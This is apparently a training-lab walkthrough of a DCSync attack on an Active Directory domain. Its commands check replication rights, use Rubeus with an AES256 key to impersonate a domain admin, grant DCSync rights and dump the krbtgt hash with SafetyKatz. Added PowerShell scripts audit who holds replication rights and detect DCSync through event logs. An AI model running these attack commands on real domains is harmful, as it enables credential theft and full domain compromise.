🪞Check for DCSync rights, add them and pull hashes

First, let's launch PowerView and check whether we have replication rights.

Replication rights in Active Directory (AD) are the permissions that control which users or groups can replicate directory information between domain controllers. They are crucial for the integrity and security of the replication process: any principal that holds them can ask a domain controller for the same data a replicating DC would receive, including password hashes, which is exactly what DCSync abuses.

We can check whether we have replication rights using the following commands:

. C:\AD\Tools\PowerView.ps1
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}
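The same check from the defender's side, as an added audit example that is not part of the original page: instead of looking for one account, it lists every principal that holds a replication control-access right on the domain object, or a GenericAll/WriteDacl/unrestricted ExtendedRight that would let it grant one to itself. It uses the RSAT ActiveDirectory module and its AD: drive rather than PowerView; the domain DN and the baseline list of expected holders are assumptions to adjust for your environment.

```powershell
# Added audit example (not from the original page): list every principal that
# holds a replication right, or a right that lets it grant one, on the domain
# naming context. Assumes the RSAT ActiveDirectory module is installed and the
# caller can read the domain object's security descriptor.
Import-Module ActiveDirectory

$DomainDN = 'DC=dollarcorp,DC=moneycorp,DC=local'   # assumption: your domain DN

# Well-known schema GUIDs of the replication control-access rights.
$ReplicationGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Assumed baseline of principals that hold replication rights in a default
# forest. Add verified service accounts (e.g. a directory sync account) here.
$Baseline = @(
    'Administrators',
    'Domain Controllers',
    'Enterprise Domain Controllers',
    'Enterprise Read-only Domain Controllers',
    'Enterprise Admins',
    'Read-only Domain Controllers'
)

$Rights = [System.DirectoryServices.ActiveDirectoryRights]
$acl    = Get-Acl -Path "AD:\$DomainDN"

$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }

    $guid      = $ace.ObjectType.ToString()
    $rightName = $null
    if ($ReplicationGuids.ContainsKey($guid)) {
        $rightName = $ReplicationGuids[$guid]
    }
    elseif ($ace.ActiveDirectoryRights.HasFlag($Rights::GenericAll)) {
        $rightName = 'GenericAll (implies every replication right)'
    }
    elseif ($ace.ActiveDirectoryRights.HasFlag($Rights::ExtendedRight) -and
            $guid -eq [guid]::Empty.ToString()) {
        $rightName = 'All extended rights (includes replication)'
    }
    elseif ($ace.ActiveDirectoryRights.HasFlag($Rights::WriteDacl)) {
        $rightName = 'WriteDacl (can grant replication rights)'
    }
    if (-not $rightName) { continue }

    # Strip the DOMAIN\ prefix so the baseline comparison is domain-agnostic.
    $name = ($ace.IdentityReference.Value -split '\\')[-1]
    [pscustomobject]@{
        Principal  = $ace.IdentityReference.Value
        Right      = $rightName
        Unexpected = ($Baseline -notcontains $name)
    }
}

# Unexpected holders come first: each of them can run DCSync (or grant it to
# itself) without being a domain controller.
$findings | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

Run it from a host with RSAT as an account that can read the domain object; anything reported as Unexpected is a DCSync-capable principal to explain or remove.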

If we don't have replication rights, let's add them. Start a process as Domain Administrator by running the command below from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

This command spawns a new shell. In that process, run the bypass command, load PowerView and then run:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student613 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Now, from a normal shell, we can check our rights again:

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student613"}

Now we need to encode lsadump::dcsync into %Pwn% and launch this command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
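What that last step looks like to a defender, as an added example that is not part of the original page: on a domain controller with "Audit Directory Service Access" enabled, each DCSync request is logged as Security event 4662 whose Properties field carries the replication right GUIDs. The script below pulls the last 24 hours of such events and reports the ones raised by accounts that are not domain controllers. The look-back window is an assumption; the list of DC machine accounts is taken from Get-ADDomainController.

```powershell
# Added detection example (not from the original page): find 4662 events in
# which a non-DC account exercised a replication right. Assumes it runs on a
# domain controller with the ActiveDirectory module and directory service
# access auditing enabled; the 24-hour window is an assumption.
Import-Module ActiveDirectory

$ReplicationGuids = @(
    '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}',  # DS-Replication-Get-Changes
    '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}',  # DS-Replication-Get-Changes-All
    '{89e95b76-444d-4c62-991a-0facbeda640c}'   # DS-Replication-Get-Changes-In-Filtered-Set
)

# Domain controllers replicate legitimately; their machine accounts end in '$'.
$DcAccounts = (Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" }

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4662
    StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue

foreach ($event in $events) {
    # Flatten the EventData <Data Name="..."> elements into a hashtable.
    $xml  = [xml]$event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Properties lists the GUIDs of the rights used; keep only replication ones.
    $used = $ReplicationGuids | Where-Object { $data['Properties'] -match [regex]::Escape($_) }
    if (-not $used) { continue }

    # Skip the domain controllers' own replication traffic.
    if ($DcAccounts -contains $data['SubjectUserName']) { continue }

    [pscustomobject]@{
        Time    = $event.TimeCreated
        Account = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        Rights  = ($used -join ', ')
        Object  = $data['ObjectName']
    }
}
```

Accounts that replicate legitimately without being DCs, such as a directory synchronisation service account, will show up here and should be allow-listed once verified. The grant performed earlier with Add-DomainObjectAcl is itself observable: with "Audit Directory Service Changes" enabled it produces event 5136 recording the change to the domain object's nTSecurityDescriptor, which is the earlier signal to alert on.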
